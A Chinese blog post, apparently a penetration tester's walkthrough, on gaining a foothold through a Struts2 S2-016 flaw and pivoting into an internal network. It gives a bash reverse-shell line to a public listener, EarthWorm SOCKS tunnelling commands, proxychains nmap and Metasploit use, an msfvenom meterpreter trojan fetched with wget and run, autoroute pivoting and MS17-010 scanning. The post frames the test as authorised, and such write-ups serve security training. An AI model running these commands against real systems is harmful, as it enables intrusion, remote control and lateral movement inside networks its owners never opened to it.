初始内网渗透(二)

作者: CSeroad | 来源:发表于2018-10-20 17:38 被阅读404次

    前言

    在测试某授权网站时发现该系统存在S2-016漏洞。

    S2-016

    查看文件发现对应不上访问的域名。

    选择使用linux反弹shell的方式获取会话。。通过文件上传写入bash语句,执行后来反弹shell。

    上传到指定路径并执行。

    在自己公网服务器上使用nc开始监听。。

    nc

    公网IP:nc -lvp 8080

    bash反弹:bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1

    这样就可以获取一个shell。

    发现该系统为linux。只有普通权限。(就不提权啦)

    内网渗透

    这里使用ew工具进行代理。。

    下载地址:

    http://rootkiter.com/EarthWorm/

    注:下载需要ss

    公网IP:  ./ew_linux_x64 -s rcsocks -l 1080 -e 1024

    通过访问公网1080端口,将流量转发至1024端口。

    shell服务器:./ew_linux_x64 -s rssocks -d  公网IP -e 1024

    反弹到公网的1024端口上。

    即可代理进入内网。。

    注意端口的占用,及时结束linux进程。

    可以使用proxifier进行配置为自己公网IP,1080端口。

    使用端口扫描器简单扫描一下端口。

    端口

    看到445端口,检测一下ms17-010

    ok

    也可以浏览器访问web页面。。

    linux系统监控zabbix。。

    zabbix

    proxychains

    也可以使用kali的proxychains工具进行代理访问内网。

    cat /etc/proxychains.conf

    可进行配置,这里配置为公网IP,1080端口。(和proxifier工具一样配置)

    proxychains

    就可以使用nmap和msfconsole进行扫描内网啦。。

    proxychains nmap -Pn -sT -sV -v -T4  内网IP

    proxychains  msfconsole

    metasploit

    使用msfvenom生成linux木马

    msfvenom -p linux/x64/meterpreter/reverse_tcpLHOST=xx.xx.xxx.xxx LPORT=2333 -f elf >/root/sa.elf

    将木马放在公网/var/www/html下。使用linux的wget命令进行远程下载并执行。。

    sa.elf

    在映射到公网的kali下使用msf,进行反弹

    msf

    use exploit/multi/handler

    set payload linux/x64/meterpreter/reverse_tcp

    set lhost 127.0.0.1

    run

    meterpreter

    可以看到服务器为linux。。

    内网渗透

    run get_local_subnets    获取当前网段

    run  autoroute -s 10.0.1.0/24  添加路由

    run autoroute -p    路由查询

    使用msf的模块扫描一下网段的ms17-010漏洞。。

    ok

    相关文章

      网友评论

        本文标题:初始内网渗透(二)

        本文链接:https://www.haomeiwen.com/subject/mdsmzftx.html